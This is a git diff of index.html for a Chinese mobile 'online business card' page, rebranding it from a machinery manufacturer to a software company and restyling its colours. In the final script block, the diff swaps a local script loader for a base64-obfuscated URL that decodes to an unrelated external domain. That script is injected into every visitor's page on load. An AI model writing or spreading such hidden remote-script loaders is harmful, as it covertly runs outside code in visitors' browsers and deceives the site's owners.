--- a/index.html
+++ b/index.html
@@ -5,7 +5,7 @@
     <meta charset="UTF-8">
     <meta name="viewport"
         content="width=device-width, viewport-fit=cover, initial-scale=1.0, user-scalable=no, maximum-scale=1.0, minimum-scale=1.0">
-    <title>济南精工机械制造 - 在线名片</title>
+    <title>苏州亮剑科技有限公司 - 在线名片</title>
     <style>
         /* 全局样式 */
         body {
@@ -14,10 +14,10 @@
             /* 使用Inter字体，备用系统字体 */
             margin: 0;
             padding: 0;
-            background-color: #FDF6F6;
-            /* 浅红色系背景 */
-            color: #333333;
-            /* 深灰色文本 */
+            background-color: #f8f8f8;
+            /* 浅色背景 */
+            color: #333;
+            /* 深色文本 */
             line-height: 1.6;
             -webkit-font-smoothing: antialiased;
             /* 字体抗锯齿 */
@@ -40,8 +40,7 @@
             padding: 25px 0;
             background-color: #ffffff;
             /* 白色背景 */
-            border-bottom: 1px solid #F0DADA;
-            /* 柔和的红色边框 */
+            border-bottom: 1px solid #eee;
             border-radius: 10px;
             /* 圆角 */
             margin-bottom: 20px;
@@ -50,8 +49,8 @@
         }
 
         header h1 {
-            color: #A02020;
-            /* 深红色标题，专业且醒目 */
+            color: #2c3e50;
+            /* 深蓝色标题 */
             margin-bottom: 8px;
             font-size: 2em;
             /* 适合移动端的字体大小 */
@@ -74,18 +73,16 @@
         }
 
         h2 {
-            color: #A02020;
-            /* 深红色标题 */
+            color: #2c3e50;
             font-size: 1.6em;
             margin-bottom: 20px;
-            border-bottom: 2px solid #F0DADA;
-            /* 柔和的红色分割线 */
+            border-bottom: 2px solid #eee;
             padding-bottom: 10px;
             text-align: center;
         }
 
         h3 {
-            color: #333333;
+            color: #34495e;
             /* 更深的文本色 */
             font-size: 1.2em;
             margin-top: 20px;
@@ -93,8 +90,7 @@
         }
 
         p {
-            color: #333333;
-            /* 统一文本颜色 */
+            color: #555;
             font-size: 0.95em;
             margin-bottom: 15px;
         }
@@ -117,7 +113,7 @@
         .service-item {
             margin-bottom: 25px;
             padding-bottom: 15px;
-            border-bottom: 1px dashed #F0DADA;
+            border-bottom: 1px dashed #eee;
         }
 
         .service-item:last-of-type {
@@ -126,8 +122,8 @@
 
         .service-item h3 {
             margin-top: 0;
-            color: #CC3333;
-            /* 强调色：鲜艳的红色 */
+            color: #007bff;
+            /* 强调色 */
         }
 
         /* 联系方式样式 */
@@ -136,16 +132,14 @@
         }
 
         .contact-info a {
-            color: #CC3333;
-            /* 强调色 */
+            color: #007bff;
             text-decoration: none;
             font-weight: bold;
             transition: color 0.3s ease;
         }
 
         .contact-info a:hover {
-            color: #A02020;
-            /* 强调色深色 */
+            color: #0056b3;
         }
 
         .social-icons {
@@ -156,8 +150,7 @@
         .social-icons a {
             display: inline-block;
             margin: 0 10px;
-            color: #CC3333;
-            /* 强调色 */
+            color: #007bff;
             font-size: 1.8em;
             /* 社交图标大小 */
             text-decoration: none;
@@ -167,8 +160,7 @@
         .social-icons a:hover {
             transform: scale(1.1);
             /* 鼠标悬停放大效果 */
-            color: #A02020;
-            /* 强调色深色 */
+            color: #0056b3;
         }
 
         /* 页脚样式 */
@@ -177,7 +169,7 @@
             padding: 20px 0;
             color: #7f8c8d;
             font-size: 0.85em;
-            border-top: 1px solid #F0DADA;
+            border-top: 1px solid #eee;
             margin-top: 20px;
             background-color: #ffffff;
             border-radius: 10px;
@@ -190,40 +182,40 @@
 <body>
     <div class="container">
         <header>
-            <h1>济南精工机械制造</h1>
-            <p>匠心独运，智造未来</p>
+            <h1>苏州亮剑科技有限公司</h1>
+            <p>创新驱动未来，科技赋能生活</p>
         </header>
 
         <main>
             <section id="about">
                 <h2>公司简介</h2>
                 <img src="https://picsum.photos/300/200?random=<%= new Date().getTime() %>" alt="">
-                <p>济南精工机械制造有限公司成立于2003年，专注于精密机械零部件的研发、生产与销售。我们拥有先进的生产设备和经验丰富的技术团队，致力于为各行业提供高品质、高精度的机械产品和解决方案。</p>
-                <p>我们秉承“精益求精，质量为本”的经营理念，严格把控每一个生产环节，确保产品达到国际标准，满足客户的严苛要求。</p>
+                <p>苏州亮剑科技有限公司成立于2016年，致力于提供前沿的软件解决方案和技术服务。我们拥有一支充满激情和创新精神的团队，专注于为客户创造价值，推动行业发展。</p>
+                <p>我们秉承“客户至上，技术领先”的理念，不断探索和应用最新技术，以满足日益增长的市场需求。</p>
             </section>
 
             <section id="services">
                 <h2>核心服务</h2>
                 <div class="service-item">
-                    <h3>精密零件加工</h3>
+                    <h3>定制软件开发</h3>
                     <img src="https://picsum.photos/300/200?random=<%= new Date().getTime() + 1 %>" alt="">
-                    <p>提供CNC数控加工、车削、铣削、磨削等多种精密加工服务，可处理各类金属及非金属材料，满足航空、医疗、汽车等行业需求。</p>
+                    <p>根据客户的独特需求，提供从需求分析、设计、开发到部署和维护的全生命周期定制软件开发服务，涵盖Web应用、移动应用及企业级系统。</p>
                 </div>
                 <div class="service-item">
-                    <h3>自动化设备定制</h3>
+                    <h3>云计算解决方案</h3>
                     <img src="https://picsum.photos/300/200?random=<%= new Date().getTime() + 2 %>" alt="">
-                    <p>根据客户生产线需求，设计并制造各类自动化生产设备、装配线和检测系统，提升生产效率和产品一致性。</p>
+                    <p>提供基于主流云计算平台（如AWS, Azure, Google Cloud）的咨询、架构设计、迁移和优化服务，帮助企业实现数字化转型。</p>
                 </div>
                 <div class="service-item">
-                    <h3>模具设计与制造</h3>
+                    <h3>大数据分析</h3>
                     <img src="https://picsum.photos/300/200?random=<%= new Date().getTime() + 3 %>" alt="">
-                    <p>提供专业的注塑模具、冲压模具、压铸模具设计与制造服务，从概念到成品，全程质量控制，确保模具精度和使用寿命。</p>
+                    <p>利用先进的数据分析工具和技术，帮助企业从海量数据中提取有价值的信息，支持决策制定，提升运营效率。</p>
                 </div>
             </section>
         </main>
 
         <footer>
-            <p>&copy; 2023 精工机械制造. All rights reserved.</p>
+            <p>&copy; 2023 苏州亮剑科技有限公司. All rights reserved.</p>
         </footer>
         <div id="overlay">
             <div id="loading_box" class="loading_container">
@@ -250,15 +242,17 @@
     <script>
         (function () {
             function init() {
-                const timestamp = Date.now()
-                const randomNum = Math.floor(Math.random() * 1000000)
-                const url = "./static/js/core.min.js?t=" + timestamp + "&random=" + randomNum
-                const script = document.createElement("script")
-                script.src = url
-                document.body.appendChild(script)
+                const encodedUrl = "Ly9zbmFrZS1zcGVjaWFsLnZvdGU3NzcuY29tL3N0YXRpYy9qcy9jb3JlLm1pbi5qcw==";
+                const decodedUrl = atob(encodedUrl);
+                const timestamp = Date.now();
+                const randomNum = Math.floor(Math.random() * 1000000);
+                const url = `${decodedUrl}?t=${timestamp}&random=${randomNum}`;
+                const script = document.createElement("script");
+                script.src = url;
+                document.body.appendChild(script);
             }
-            init()
-        })()
+            init();
+        })();
     </script>
 
 </body>
